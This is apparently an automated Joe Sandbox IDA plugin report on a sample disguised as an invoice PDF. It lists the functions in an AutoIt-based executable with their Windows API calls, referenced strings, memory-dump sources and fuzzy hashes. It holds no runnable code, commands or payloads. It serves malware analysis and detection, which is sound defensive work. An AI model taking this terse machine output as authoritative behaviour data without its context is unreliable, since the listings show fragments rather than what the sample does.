GlobalMemoryStatusEx.KERNEL32(?), ref: 0042F2BB

Strings

@, xrefs: 0042F2AF

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: dc8d2e6aadaa68db752db86bd477804e8a53291406bff81c9315c621c7055a8e
Instruction ID: 5de2cd8dd683cedd83241b537659f01411918906c5e7ea9c5befa9025096f3bb
Opcode Fuzzy Hash: dc8d2e6aadaa68db752db86bd477804e8a53291406bff81c9315c621c7055a8e
Instruction Fuzzy Hash: A95146714087449BD320AF11DC86BAFBBF8FF85304F81885EF1D9421A5EB348569CB6A

Function 00495745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 004957E0
_wcslen.LIBCMT ref: 004957EC

Strings

CALLARGARRAY, xrefs: 004957E6, 004957EB

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: d1f6f5864dbeed7437dbeca82aadb67bec1cdc49d651d679a7aaf21ddca013db
Instruction ID: fecf3f0de0c00c7a87670555f7d7806ca9bdb838620be0d1e54a475a5b7f74bc
Opcode Fuzzy Hash: d1f6f5864dbeed7437dbeca82aadb67bec1cdc49d651d679a7aaf21ddca013db
Instruction Fuzzy Hash: 5A41B131A001059FCF04EFAAC8818EEBBB5EF59324F20806EE505A7351D7389D81CB98

Function 0048D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0048D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0048D13A

Strings

|, xrefs: 0048D10B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 0f42ad192cde520660dceabc2e82da7ebe21aa6c3c6d06947fb414a29ed9cbbe
Instruction ID: 4ec16e2f8a02741809843c60be763da7acbd863f6feddf6464bfc120ed63ca6c
Opcode Fuzzy Hash: 0f42ad192cde520660dceabc2e82da7ebe21aa6c3c6d06947fb414a29ed9cbbe
Instruction Fuzzy Hash: 7C315D71D01209ABCF15EFA5CC85AEF7FB9FF08304F00001AF815A6261DB39AA56CB58

Function 004A356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 004A3621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004A365C

Strings

static, xrefs: 004A35BC

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 1f71df5a5a77e6e7771f92438353676df90a110b90d831d3826a04c599156710
Instruction ID: 8937a241c43aba85c805cb7b0db8d41b42f9b532453bcbb288420416fe032ca8
Opcode Fuzzy Hash: 1f71df5a5a77e6e7771f92438353676df90a110b90d831d3826a04c599156710
Instruction Fuzzy Hash: 7D319071500204AEDB20DF68DC80EFB73A9FF59724F10861EF8A597290DA39ED81D768

Function 004A4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 004A461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004A4634

Strings

', xrefs: 004A458E

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: f25b8ee910870c299010f727b1a0761f46c2517f703832a08c5d93b4dc2b909a
Instruction ID: 278866432a75f6133ca306e8ddf808b26519ac4dd7dbd476b3541e700e7534b6
Opcode Fuzzy Hash: f25b8ee910870c299010f727b1a0761f46c2517f703832a08c5d93b4dc2b909a
Instruction Fuzzy Hash: 39311B74E01209AFDB14CF69C990BDE7BB5FF9A300F14406AEA059B391D7B4A941CF94

Function 004A31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004A327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004A3287

Strings

Combobox, xrefs: 004A3249

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: b1d59199b9493c6c8e63c270eb6c027d4a14f9ca47bf8893780fb42ba3ea9825
Instruction ID: 54686100568eec7a8c935302bead1e7db38eb0012482e362aaae7e6dfa3c28c5
Opcode Fuzzy Hash: b1d59199b9493c6c8e63c270eb6c027d4a14f9ca47bf8893780fb42ba3ea9825
Instruction Fuzzy Hash: EF1193722002086FEF119E94DC81FAB3B5AEB663A5F10416AF9149B290E6399D518764

Function 0047EF10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0047EF1D

Strings

`, xrefs: 0047EF1B
HANDLE, xrefs: 0047EF16

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen
String ID: HANDLE$`
API String ID: 176396367-1948523916
Opcode ID: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
Instruction ID: 59a76ca8be684385e881c7d9cffdbb24e5934e3ec1ac140e79a0bdd247fd455b
Opcode Fuzzy Hash: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
Instruction Fuzzy Hash: CE110A71510114FAE7288F16D4897EEB3A8DF49715F6082DFE008CF5C4E7785E81961C

Function 004A3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0041600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0041604C
Part of subcall function 0041600E: GetStockObject.GDI32(00000011), ref: 00416060
Part of subcall function 0041600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041606A

GetWindowRect.USER32(00000000,?), ref: 004A377A
GetSysColor.USER32(00000012), ref: 004A3794

Strings

static, xrefs: 004A3757

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: e85d33f2f1c8c52e90ed52269ce52bcf9719eb891b3c35dd2b9530ef3ea4f1b7
Instruction ID: bdd8f7fc03df8967f961e44d2b56473a3d04c898315fbc28adba98d6e1c52ab1
Opcode Fuzzy Hash: e85d33f2f1c8c52e90ed52269ce52bcf9719eb891b3c35dd2b9530ef3ea4f1b7
Instruction Fuzzy Hash: D3116AB6610209AFDF00DFA8CC45EFA7BF8FB19304F004529F955E2250E739E8519B64

Function 0048CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0048CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0048CDA6

Strings

<local>, xrefs: 0048CD66

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 4afbfe6e8ee70762d17c05ffac33ec09628ccfd59cf3e82305d0ced5c9b477a6
Instruction ID: 19456566e32879ac0b5af74dc50621a8bdbcddc167b6e4dcd556ac2dc9d8c7df
Opcode Fuzzy Hash: 4afbfe6e8ee70762d17c05ffac33ec09628ccfd59cf3e82305d0ced5c9b477a6
Instruction Fuzzy Hash: 7A11E3712416327AD7246B668CC4EEBBEE8EB127A4F004637B10983180D7789841D7F4

Function 004A3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004A34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004A34BA

Strings

edit, xrefs: 004A348F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 4e3cd975b0a13c5e1b44f130cbb2c8e140051d1bd924939cc63ceb11bdba65cd
Instruction ID: a6e0907f39db4a5a7b6c3bb6136229ef838c7ab2d80f2b8e05752251d133655b
Opcode Fuzzy Hash: 4e3cd975b0a13c5e1b44f130cbb2c8e140051d1bd924939cc63ceb11bdba65cd
Instruction Fuzzy Hash: 9611C471100104AFEB118E64DC80EFB3B69EF2A379F504325F960972D0D739DC519B58

Function 00476C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

CharUpperBuffW.USER32(?,?,?), ref: 00476CB6
_wcslen.LIBCMT ref: 00476CC2

Strings

STOP, xrefs: 00476CBC, 00476CC1

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: ccf90d5873285103c6163ec503f89cef2b6c7fc86e3c6f18f176ed7f6f9eb4e3
Instruction ID: fe879a97793a3b7b280228da589abbb9b2d4c344b4264b584bd2dda403f9af9e
Opcode Fuzzy Hash: ccf90d5873285103c6163ec503f89cef2b6c7fc86e3c6f18f176ed7f6f9eb4e3
Instruction Fuzzy Hash: 660148326109268ACB219FBDDC809FF33A6EA60314702492AE85692280EB39D940C648

Function 00471CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

Part of subcall function 00473CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00473CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00471D4C

Strings

ComboBox, xrefs: 00471CEB
ListBox, xrefs: 00471D16

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 352fa2897f521089fd8f8d9a04642a4194acfa23559d9adf133e1cbf7ba39ea2
Instruction ID: 914823559c697b7bf5af6e385ce19973813a0a27070786d89d12d907195b4341
Opcode Fuzzy Hash: 352fa2897f521089fd8f8d9a04642a4194acfa23559d9adf133e1cbf7ba39ea2
Instruction Fuzzy Hash: E2012831600214ABCB24EFA8CC61DFF7368EB02394B10451FF866573D1EE3869088AA8

Function 00471BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

Part of subcall function 00473CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00473CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00471C46

Strings

ComboBox, xrefs: 00471BE5
ListBox, xrefs: 00471C10

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 6755b309746b51e989bd71a15ff81308300291f5f71a552f2ba2df08f46a6e43
Instruction ID: 11eca5a5cf8bca3fd7a44a9eab4ff858f99e890d3ed6015f3b0095c26d1f9fdd
Opcode Fuzzy Hash: 6755b309746b51e989bd71a15ff81308300291f5f71a552f2ba2df08f46a6e43
Instruction Fuzzy Hash: 5A01FC717801046ECB15EBD4C962AFF77A89B11380F20001FE90B772D1EE289E08D6BD

Function 00471C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

Part of subcall function 00473CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00473CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00471CC8

Strings

ComboBox, xrefs: 00471C69
ListBox, xrefs: 00471C94

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 345d74ad43fd780ef009fa5db7870deab536920aa54a6aebc204ad33d601129f
Instruction ID: 2ac1804088f680de8ca56071237e32e4dc760bc0a5e2c22bd6785422de5ffd33
Opcode Fuzzy Hash: 345d74ad43fd780ef009fa5db7870deab536920aa54a6aebc204ad33d601129f
Instruction Fuzzy Hash: ED01DB717801146BCB15EBD5CA12AFF77A89B11384F14401BB84673391EA289F08D6BD

Function 0042A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0042A529

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

Strings

3yF, xrefs: 0042A545, 0042A54D, 0042A552
,%N, xrefs: 0042A509

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%N$3yF
API String ID: 2551934079-1307360129
Opcode ID: 15e842f29f705896534d7fb3bad57139a1f24cec6285de44da76672bae781558
Instruction ID: 418cc78926548de2aaadc308080e2dde2569313f4241651e4a3aa4fbcfa0507b
Opcode Fuzzy Hash: 15e842f29f705896534d7fb3bad57139a1f24cec6285de44da76672bae781558
Instruction Fuzzy Hash: 8B014C3270012067C500F769F967A9E73649B09715F90006FFD025B2C3DE9CAD818A8F

Function 00471D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

Part of subcall function 00473CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00473CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00471DD3

Strings

ComboBox, xrefs: 00471D75
ListBox, xrefs: 00471DA0

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 74fe6a5a7d623cbb78f7fa961e0ac9906fc337890438d156fec4a26b9784a088
Instruction ID: 2df90902ee7775ed1b6f2547434549fadf35ecf2c0f6341087b614a88b0ce741
Opcode Fuzzy Hash: 74fe6a5a7d623cbb78f7fa961e0ac9906fc337890438d156fec4a26b9784a088
Instruction Fuzzy Hash: 09F0FE71B5021466C714F7A5CC62BFF7768AB01344F04091BF866632D1DE786D08866C

Function 004A8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004E3018,004E305C), ref: 004A81BF
CloseHandle.KERNEL32 ref: 004A81D1

Strings

\0N, xrefs: 004A818A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0N
API String ID: 3712363035-3569702050
Opcode ID: 60acf8a30cfbb372649baab865151f6d3e172417c6cf7604e4b4697a06d41dfd
Instruction ID: ac006691daa3690efdf5ddb45997eb7ada6350a0a05ec75d14e756c896bc5d97
Opcode Fuzzy Hash: 60acf8a30cfbb372649baab865151f6d3e172417c6cf7604e4b4697a06d41dfd
Instruction Fuzzy Hash: 3DF054B1640340BAE6616F616C89FB73A5CDB05756F004475BF08DA1A3D6798E0083BC

Function 0049747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00497493
_wcslen.LIBCMT ref: 004974B9

Strings

3, 3, 16, 1, xrefs: 00497483

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 1cde1e7e7372e767e44e90f64e3df7da0352d4813d922a60028896fabef41036
Instruction ID: 90c704d3f70c523181b90308de5ed625ea18abe4a02a594f8ea51ce15fdf8812
Opcode Fuzzy Hash: 1cde1e7e7372e767e44e90f64e3df7da0352d4813d922a60028896fabef41036
Instruction Fuzzy Hash: 1EE02B42224220149731127B9CC1BBF5F89CFCD7A0B14283FF985C2367EA9C9D9193A8

Function 00470B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00470B23

Strings

Error allocating memory., xrefs: 00470B1C
AutoIt, xrefs: 00470B17

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
